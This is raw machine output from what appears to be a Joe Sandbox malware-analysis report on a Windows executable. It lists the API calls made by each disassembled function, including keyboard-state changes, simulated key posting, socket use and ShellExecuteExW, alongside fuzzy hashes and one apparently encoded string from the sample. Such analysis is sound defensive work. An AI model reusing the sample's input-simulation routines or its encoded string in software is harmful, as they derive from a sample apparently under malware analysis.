                                                                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C9D6D7
                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C9D6F5
                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C9D716
                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00C9D735
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9D75A
                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C9D77D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1211466189-0
                                                                                                                            • Opcode ID: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
                                                                                                                            • Instruction ID: ae76cc01a773fa6a272d38739abbde7abb43cb49a430391e17751df2162d7845
                                                                                                                            • Opcode Fuzzy Hash: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
                                                                                                                            • Instruction Fuzzy Hash: 11B18B75600215EBDF14CF69C9C97AD7BB1BF04701F09806AFC5AAB299D734AA90CB50
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C12ACF
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C12B17
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C21A
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C286
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1268545403-0
                                                                                                                            • Opcode ID: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
                                                                                                                            • Instruction ID: 005a299851753a5cf2a580985d6b3ba21bdef15e8f1a855525b087cd837b5bd0
                                                                                                                            • Opcode Fuzzy Hash: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
                                                                                                                            • Instruction Fuzzy Hash: 4B41EA396097809BC7798B299CCCBEE7B95BF47310F14841EE05786571C6B1A9E1F720
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C770DD
                                                                                                                              • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                                                                              • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C77114
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C77130
                                                                                                                            • _memmove.LIBCMT ref: 00C7717E
                                                                                                                            • _memmove.LIBCMT ref: 00C7719B
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C771AA
                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C771BF
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C771DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 256516436-0
                                                                                                                            • Opcode ID: 5e412b1a59d35745fcd34ef71227b3956de12b51ad3f2f3dd6e227a43208581f
                                                                                                                            • Instruction ID: c8cb10215b02209d002426a765cc860266763f804a3cf0aebf770c81f6c96624
                                                                                                                            • Opcode Fuzzy Hash: 5e412b1a59d35745fcd34ef71227b3956de12b51ad3f2f3dd6e227a43208581f
                                                                                                                            • Instruction Fuzzy Hash: CE315332900205EBCF00DFA4DC89BAE7778EF45710F2441A9E904DB256D7309E11DB60
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C961EB
                                                                                                                            • GetDC.USER32(00000000), ref: 00C961F3
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C961FE
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C9620A
                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C96246
                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C96257
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C96291
                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C962B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3864802216-0
                                                                                                                            • Opcode ID: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
                                                                                                                            • Instruction ID: d62c92213ec2e4f95ad69bde290e27cd2177264f5b14a9fa1dda9663884c46c8
                                                                                                                            • Opcode Fuzzy Hash: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
                                                                                                                            • Instruction Fuzzy Hash: E9316D72201614BFEF118F60CC8AFEA3BA9EF49765F044066FE08DA191C6759D52CB60
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2931989736-0
                                                                                                                            • Opcode ID: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
                                                                                                                            • Instruction ID: 1d42c36059b607c3df27dce4205f1c19e50c5ff9a57d01e33851d05fe3bb6350
                                                                                                                            • Opcode Fuzzy Hash: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
                                                                                                                            • Instruction Fuzzy Hash: 9E21F0616012267FE2347626ADC2FFB739CAE5139CF084020FD05D6643EB65DF91D2A1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                              • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                                                                            • _wcstok.LIBCMT ref: 00C7EC94
                                                                                                                            • _wcscpy.LIBCMT ref: 00C7ED23
                                                                                                                            • _memset.LIBCMT ref: 00C7ED56
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                            • String ID: X
                                                                                                                            • API String ID: 774024439-3081909835
                                                                                                                            • Opcode ID: 72fe155624f70b66947c167136c97c2bb9cf2d37190b3eacbff7b3cde796b932
                                                                                                                            • Instruction ID: f221e7351baf5345996c7a027753f7bdd997ee66728ec72efdd78e0da62365ae
                                                                                                                            • Opcode Fuzzy Hash: 72fe155624f70b66947c167136c97c2bb9cf2d37190b3eacbff7b3cde796b932
                                                                                                                            • Instruction Fuzzy Hash: A1C17271508300DFC724EF24C855A9AB7E4FF8A310F10896DF899972A2DB31ED45EB82
                                                                                                                            APIs
                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C86C00
                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C86C21
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C86C34
                                                                                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00C86CEA
                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00C86CA7
                                                                                                                              • Part of subcall function 00C6A7E9: _strlen.LIBCMT ref: 00C6A7F3
                                                                                                                              • Part of subcall function 00C6A7E9: _memmove.LIBCMT ref: 00C6A815
                                                                                                                            • _strlen.LIBCMT ref: 00C86D44
                                                                                                                            • _memmove.LIBCMT ref: 00C86DAD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3619996494-0
                                                                                                                            • Opcode ID: 87d2bc950bbb6465c2a85e6df7d303543261f4665de29ac1876b313dcae90f0f
                                                                                                                            • Instruction ID: 603976aace9f7ffbb77d9f6b16dbb19d170e0b60ff64435d5c247aab44a5c29f
                                                                                                                            • Opcode Fuzzy Hash: 87d2bc950bbb6465c2a85e6df7d303543261f4665de29ac1876b313dcae90f0f
                                                                                                                            • Instruction Fuzzy Hash: F081D171208300ABC710FB24CC96FABB7E8EF85718F10491DF9559B292DA70EE45EB56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
                                                                                                                            • Instruction ID: db8eebb2e178521de9552a03f9829104710d0c920a3bd47e8da2b5e061099cfc
                                                                                                                            • Opcode Fuzzy Hash: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
                                                                                                                            • Instruction Fuzzy Hash: 82716030900109EFDB04CF59CC49AFEBB79FF86710F188159FA15AA251C734AA51DFA4
                                                                                                                            APIs
                                                                                                                            • IsWindow.USER32(00EF5CD8), ref: 00C9B3EB
                                                                                                                            • IsWindowEnabled.USER32(00EF5CD8), ref: 00C9B3F7
                                                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C9B4DB
                                                                                                                            • SendMessageW.USER32(00EF5CD8,000000B0,?,?), ref: 00C9B512
                                                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00C9B54F
                                                                                                                            • GetWindowLongW.USER32(00EF5CD8,000000EC), ref: 00C9B571
                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C9B589
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4072528602-0
                                                                                                                            • Opcode ID: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
                                                                                                                            • Instruction ID: 94ca613409c7a91fefeea44c95183d5ab380d3942bb4d7480c6dc14c9bb66deb
                                                                                                                            • Opcode Fuzzy Hash: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
                                                                                                                            • Instruction Fuzzy Hash: A0718C34600204FFDF209F65E998FBA7BB9EF09300F14415AFA65972A2C731AE51EB50
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C8F448
                                                                                                                            • _memset.LIBCMT ref: 00C8F511
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00C8F556
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                              • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00C8F5CD
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C8F5FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3522835683-2766056989
                                                                                                                            • Opcode ID: 26293dc9d75988e301dd9da894bfda5574c3212b866c1f9c6f1e405a725bf3cb
                                                                                                                            • Instruction ID: be345055efb5fb890140dd9b7801efc3b2a839cf868b9d2d01ae84178658aea1
                                                                                                                            • Opcode Fuzzy Hash: 26293dc9d75988e301dd9da894bfda5574c3212b866c1f9c6f1e405a725bf3cb
                                                                                                                            • Instruction Fuzzy Hash: D361BE71A006199FCB14EFA4C4919AEBBF4FF49314F14806DE855AB391CB30EE42DB94
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 00C70F8C
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C70FA1
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C71002
                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C71030
                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7104F
                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C71095
                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C710B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
                                                                                                                            • Instruction ID: 39283a9e82c56a8808e7a8ade612280ce40b1cb6e52d331219abe977f64721ba
                                                                                                                            • Opcode Fuzzy Hash: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
                                                                                                                            • Instruction Fuzzy Hash: 8351F4605047D57EFB3646788C09BBABEA95B06304F0CC589E5EC898C3C2E8EED5D751
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(00000000), ref: 00C70DA5
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C70DBA
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C70E1B
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C70E47
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C70E64
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C70EA8
                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C70EC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
                                                                                                                            • Instruction ID: 4d1257bde44a601d1da64ff4f4565e7db2138ef6ee2b16668abd4c67b735e523
                                                                                                                            • Opcode Fuzzy Hash: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
                                                                                                                            • Instruction Fuzzy Hash: C551D4A05447D5BDFB3287648C45B7ABFA96B06300F18C88DF1EC864C3D395AE98E750
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsncpy$LocalTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2945705084-0
                                                                                                                            • Opcode ID: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
                                                                                                                            • Instruction ID: 693b234e797d8a55856c5634a1edf2f235b61a9fa8c0936c9766de9d72353471
                                                                                                                            • Opcode Fuzzy Hash: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
                                                                                                                            • Instruction Fuzzy Hash: C841A475D2061476CB15EBB48C86ACFB3B89F04310F508966F519E3221FB34E356D7AA
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C12357
                                                                                                                            • ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00C12399
                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00C123A7
                                                                                                                            Strings
                                                                                                                            • w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C4BFF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
